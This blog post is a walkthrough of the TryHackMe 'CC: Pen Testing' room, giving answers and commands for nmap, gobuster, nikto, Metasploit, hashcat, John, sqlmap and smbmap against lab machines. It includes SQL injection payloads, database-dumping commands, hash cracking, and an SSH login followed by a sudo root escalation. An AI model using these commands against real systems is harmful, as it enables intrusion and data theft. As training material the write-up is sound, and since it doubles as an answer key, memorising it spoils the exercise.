---
layout: post
title: "CC: Pen Testing - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - writeups
  - thm
  - web
  - network
date: 2020/12/05 19:15:00
updated: 2020/12/17 19:09:00
thumbnail: /images/TryHackMe/cc_pen_testing.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** CC: Pen Testing
- **Profile:** [tryhackme.com](https://tryhackme.com/room/ccpentesting)
- **Difficulty:** Easy
- **Description**: A crash course on various topics in penetration testing.

![CC: Pen Testing](/images/TryHackMe/cc_pen_testing.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap netcat gobuster ffuf nikto metasploit hashcat john sqlmap smbmap smbclient haiti
```

**Disclaimer**: I won't give much details because the whole room is about
searching options in the man page or help message so there si nothing more to add.

## [Section 1 - Network Utilities] - nmap

> What does nmap stand for?

Answer: {% spoiler Network Mapper %}

```
$ man nmap
```

> How do you specify which port(s) to scan?

Answer: {% spoiler -p %}

> How do you do a "ping scan"(just tests if the host(s) is up)?

Answer: {% spoiler -sn %}

> What is the flag for a UDP scan?

Answer: {% spoiler -sU %}

> How do you run default scripts?

Answer: {% spoiler -sC %}

> How do you enable "aggressive mode" (Enables OS detection, version detection, script scanning, and traceroute)

Answer: {% spoiler -A %}

> What flag enables OS detection

Answer: {% spoiler -O %}

> How do you get the versions of services running on the target machine

Answer: {% spoiler -sV %}

> How many ports are open on the machine?

Answer: {% spoiler 1 %}

```
# Nmap 7.91 scan initiated Sat Dec  5 15:13:14 2020 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.153.133
Nmap scan report for 10.10.153.133
Host is up (0.034s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  5 15:13:58 2020 -- 1 IP address (1 host up) scanned in 44.16 seconds
```

> What service is running on the machine?

Answer: {% spoiler Apache %}

> What is the version of the service?

Answer: {% spoiler 2.4.18 %}

> What is the output of the http-title script(included in default scripts)

Answer: {% spoiler Apache2 Ubuntu Default Page: It works %}

## [Section 1 - Network Utilities] - Netcat

> How do you listen for connections?

Answer: {% spoiler -l %}

> How do you enable verbose mode (allows you to see who connected to you)?

Answer: {% spoiler -v %}

> How do you specify a port to listen on

Answer: {% spoiler -p %}

> How do you specify which program to execute after you connect to a host (One of the most infamous)?

Answer: {% spoiler -e %}

> How do you connect to udp ports

Answer: {% spoiler -u %}

## [Section 2 - Web Enumeration] - gobuster

> How do you specify directory/file brute forcing mode?

Answer: {% spoiler dir %}

> How do you specify dns bruteforcing mode?

Answer: {% spoiler dns %}

> What flag sets extensions to be used?
>
> Example: if the php extension is set, and the word is "admin" then gobuster will test admin.php against the webserver

Answer: {% spoiler -x %}

> What flag sets a wordlist to be used?

Answer: {% spoiler -w %}

> How do you set the Username for basic authentication (If the directory requires a username/password)?

Answer: {% spoiler -U %}

> How do you set the password for basic authentication?

Answer: {% spoiler -P %}

> How do you set which status codes gobuster will interpret as valid?
>
> Example: 200,400,404,204

Answer: {% spoiler -s %}

> How do you skip ssl certificate verification?

Answer: {% spoiler -k %}

> How do you specify a User-Agent?

Answer: {% spoiler -a %}

> How do you specify a HTTP header?

Answer: {% spoiler -H %}

> What flag sets the URL to bruteforce?

Answer: {% spoiler -u %}

> What is the name of the hidden directory

Answer: {% spoiler secret %}

```
$ ffuf -u http://10.10.186.153/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
```

> What is the name of the hidden file with the extension xxa

Answer: {% spoiler password %}

```
$ ffuf -u http://10.10.186.153/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -e .xxa -mc 200
```

## [Section 2 - Web Enumeration] - nikto

> How do you specify which host to use?

Answer: {% spoiler -h %}

> What flag disables ssl?

Answer: {% spoiler -nossl %}

> How do you force ssl?

Answer: {% spoiler -ssl %}

> How do you specify authentication (username + pass)?

Answer: {% spoiler -id %}

> How do you select which plugin to use?

Answer: {% spoiler -Plugins %}

> Which plugin checks if you can enumerate apache users?

Answer: {% spoiler apacheusers %}

```
$ nikto -list-plugins | grep -i apache
```

> How do you update the plugin list

Answer: {% spoiler -update %}

> How do you list all possible plugins to use

Answer: {% spoiler -list-plugins %}

## [Section 3 Metasploit]: Setting Up

> What command allows you to search modules?

Answer: {% spoiler search %}

> How do you select a module?

Answer: {% spoiler use %}

> How do you display information about a specific module?

Answer: {% spoiler info %}

> How do you list options that you can set?

Answer: {% spoiler options %}

> What command lets you view advanced options for a specific module?

Answer: {% spoiler advanced %}

> How do you show options in a specific category

Answer: {% spoiler show %}

## [Section 3 - Metasploit]: - Selecting a module

> How do you select the eternalblue module?

Answer: {% spoiler use exploit/windows/smb/ms17_010_eternalblue %}

> What option allows you to select the target host(s)?

Answer: {% spoiler RHOSTS %}

> How do you set the target port?

Answer: {% spoiler RPORT %}

> What command allows you to set options?

Answer: {% spoiler set %}

> How would you set SMBPass to "username"?

Answer: {% spoiler set SMBPass username %}

> How would you set the SMBUser to "password"?

Answer: {% spoiler set SMBUser password %}

> What option sets the architecture to be exploited?

Answer: {% spoiler arch %}

> What option sets the payload to be sent to the target machine?

Answer: {% spoiler payload %}

> Once you've finished setting all the required options, how do you run the exploit?

Answer: {% spoiler exploit %}

> What flag do you set if you want the exploit to run in the background?

Answer: {% spoiler -J %}

> How do you list all current sessions?

Answer: {% spoiler sessions %}

> What flag allows you to go into interactive mode with a session ("drops you either into a meterpreter or regular shell")

Answer: {% spoiler -i %}

## [Section 3 - Metasploit]: meterpreter

> What command allows you to download files from the machine?

Answer: {% spoiler download %}

> What command allows you to upload files to the machine?

Answer: {% spoiler upload %}

> How do you list all running processes?

Answer: {% spoiler ps %}

> How do you change processes on the victim host(Ideally it will allow you to change users and gain the perms associated with that user

Answer: {% spoiler migrate %}

> What command lists files in the current directory on the remote machine?

Answer: {% spoiler ls %}

> How do you execute a command on the remote host?

Answer: {% spoiler execute %}

> What command starts an interactive shell on the remote host?

Answer: {% spoiler shell %}

> How do you find files on the target host (Similar function to the linux command "find")

Answer: {% spoiler search %}

> How do you get the output of a file on the remote host?

Answer: {% spoiler cat %}

> How do you put a meterpreter shell into "background mode" (allows you to run other msf modules while also keeping the meterpreter shell as a session)?

Answer: {% spoiler background %}

## [Section 3 - Metasploit]: Final Walkthrough

> Select the module that needs to be exploited

Answer: {% spoiler use exploit/multi/http/nostromo_code_exec %}

> What variable do you need to set, to select the remote host

Answer: {% spoiler RHOSTS %}

> How do you set the port to 80

Answer: {% spoiler set RPORT 80 %}

> How do you set listening address (Your machine)

Answer: {% spoiler LHOST %}

> What is the name of the secret directory in the /var/nostromo/htdocs directory?

Answer: {% spoiler s3cretd1r %}

> What are the contents of the file inside of the directory?

Answer: {% spoiler Woohoo! %}

```
$ cat /var/nostromo/htdocs/s3cretd1r/nice
```

## [Section 4 - Hash Cracking]: hashcat

> What flag sets the mode.

Answer: {% spoiler -m %}

> What flag sets the "attack mode"

Answer: {% spoiler -a %}

> What is the attack mode number for Brute-force

Answer: {% spoiler 3 %}

> What is the mode number for SHA3-512

Answer: {% spoiler 17600 %}

> Crack This Hash:56ab24c15b72a457069c5ea42fcfc640
>
> Type: MD5

Answer: {% spoiler happy %}

```
$ hashcat --force hash -m 0 -a 3
```

> Crack this hash:
>
> 4bc9ae2b9236c2ad02d81491dcb51d5f
>
> Type: MD4

Answer: {% spoiler nootnoot %}

```
$ hashcat --force hash -m 900 -a 3
```

## [Section 4 - Hash Cracking]: John The Ripper

> What flag let's you specify which wordlist to use?

Answer: {% spoiler --wordlist %}

> What flag lets you specify which hash format (Ex: MD5,SHA1 etc.) to use?

Answer: {% spoiler --format %}

> How do you specify which rule to use?

Answer: {% spoiler --rules %}

> Crack this hash:
>
> 5d41402abc4b2a76b9719d911017c592
>
> Type: MD5

Answer: {% spoiler hello %}

```
$ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5
```

> Crack this hash:
>
> 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
>
> Type: SHA1

Answer: {% spoiler password %}

```
$ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=raw-sha1
```

## [Section 5 - SQL Injection]: sqlmap

> How do you specify which url to check?

Answer: {% spoiler -u %}

> What about which google dork to use?

Answer: {% spoiler -g %}

> How do you select which parameter to use? (Example: in the url http://ex.com?test=1 the parameter would be test.)

Answer: {% spoiler -p %}

> What flag sets which database is in the target host's backend? (Example: If the flag is set to mysql then sqlmap will only test mysql injections).

Answer: {% spoiler --dbms %}

> How do you select the level of depth sqlmap should use (Higher = more accurate and more tests in general).

Answer: {% spoiler --level %}

> How do you dump the table entries of the database?

Answer: {% spoiler --dump %}

> Which flag sets which db to enumerate?

Answer: {% spoiler -D %}

> Which flag sets which table to enumerate?

Answer: {% spoiler -T %}

> Which flag sets which column to enumerate?

Answer: {% spoiler -C %}

> How do you ask sqlmap to try to get an interactive os-shell?

Answer: {% spoiler --os-shell %}

> What flag dumps all data from every table

Answer: {% spoiler --dump-all %}

## [Section 5 - SQL Injection]: Vulnerable Web Application

> How many types of sqli is the site vulnerable too?

Answer: {% spoiler xxx %}

```
$ sqlmap -u http://10.10.197.135/ --method POST --data 'msg=noraj' -p msg
...
---
Parameter: msg (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg=noraj' RLIKE (SELECT (CASE WHEN (4460=4460) THEN 0x6e6f72616a ELSE 0x28 END))-- WvRh

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: msg=noraj' AND GTID_SUBSET(CONCAT(0x7162717871,(SELECT (ELT(3170=3170,1))),0x7170706271),3170)-- Ldfz

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: msg=noraj' AND (SELECT 1663 FROM (SELECT(SLEEP(5)))VDrJ)-- VcQG
---
[17:14:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
```

> What is the name of the database?

Answer: {% spoiler tests %}

```
$ sqlmap -u http://10.10.197.135/ --method POST --data 'msg=noraj' -p msg --dbms mysql --current-db
```

> How many tables are in the database?

Answer: {% spoiler 2 %}

```
$ sqlmap -u http://10.10.197.135/ --method POST --data 'msg=noraj' -p msg --dbms mysql --tables -D tests
```

> What is the value of the flag?

Answer: {% spoiler found_me %}

```
$ sqlmap -u http://10.10.197.135/ --method POST --data 'msg=noraj' -p msg --dbms mysql --dump -D tests
```

## [Section 6 - Samba]: smbmap

> How do you set the username to authenticate with?

Answer: {% spoiler -u %}

> What about the password?

Answer: {% spoiler -p %}

> How do you set the host?

Answer: {% spoiler -H %}

> What flag runs a command on the server (assuming you have permissions that is)?

Answer: {% spoiler -x %}

> How do you specify the share to enumerate?

Answer: {% spoiler -s %}

> How do you set which domain to enumerate?

Answer: {% spoiler -d %}

> What flag downloads a file?

Answer: {% spoiler --download %}

> What about uploading one?

Answer: {% spoiler --upload %}

> Given the username "admin", the password "password", and the ip "10.10.10.10", how would you run ipconfig on that machine

Answer: {% spoiler `smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"` %}

## [Section 6 - Samba]: smbclient

> How do you specify which domain (workgroup) to use when connecting to the host

Answer: {% spoiler -W %}

> How do you specify the ip address of the host?

Answer: {% spoiler -I %}

> How do you run the command "ipconfig" on the target machine?

Answer: {% spoiler `-c "ipconfig"` %}

> How do you specify the username to authenticate with?

Answer: {% spoiler -U %}

> How do you specify the password to authenticate with?

Answer: {% spoiler -P %}

> What flag is set to tell smbclient to not use a password?

Answer: {% spoiler -N %}

> While in the interactive prompt, how would you download the file test, assuming it was in the current directory

Answer: {% spoiler get test %}

> In the interactive prompt, how would you upload your /etc/hosts file

Answer: {% spoiler put /etc/hosts %}

## [Section 7 - Final Exam]: Good Luck :D

> What is the user.txt

Answer: {% spoiler supernootnoot %}

Network enumeration:

```
# Nmap 7.91 scan initiated Sat Dec  5 17:34:48 2020 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.247.162
Nmap scan report for 10.10.247.162
Host is up (0.035s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  5 17:35:52 2020 -- 1 IP address (1 host up) scanned in 64.11 seconds
```

Web directory enumeration:

```
$ ffuf -u http://10.10.247.162/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
...
secret                  [Status: 301, Size: 315, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10]
                        [Status: 200, Size: 11321, Words: 3503, Lines: 376]

$ ffuf -u http://10.10.247.162/secret/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -e .txt -fc 403
...
secret.txt              [Status: 200, Size: 46, Words: 1, Lines: 2]

$ curl http://10.10.247.162/secret/secret.txt
nyan:046385855FC9580393853D8E81F240B66FE9A7B8
```

Let's identify the hash type:

```
$ haiti 046385855FC9580393853D8E81F240B66FE9A7B8
SHA-1 [HC: 100] [JtR: raw-sha1]
Double SHA-1 [HC: 4500]
RIPEMD-160 [HC: 6000] [JtR: ripemd-160]
Haval-160
Tiger-160
HAS-160
LinkedIn [HC: 190] [JtR: raw-sha1-linkedin]
Skein-256(160)
Skein-512(160)
```

Let's crack this hash.

```
$ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=raw-sha1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
nyan             (nyan)
1g 0:00:00:01 DONE (2020-12-05 17:46) 0.5747g/s 2856Kp/s 2856Kc/s 2856KC/s nyan..nyamwezi
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
```

Let's connect:

```
$ ssh nyan@10.10.247.162
nyan@10.10.247.162's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019
nyan@ubuntu:~$ cat user.txt
```

> What is the root.txt

Answer: {% spoiler congratulations!!!! %}

```
nyan@ubuntu:~$ id
uid=1000(nyan) gid=1000(nyan) groups=1000(nyan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)

nyan@ubuntu:~$ sudo -l
Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su

nyan@ubuntu:~$ sudo su root
root@ubuntu:/home/nyan# cd
root@ubuntu:~# cat root.txt 
```
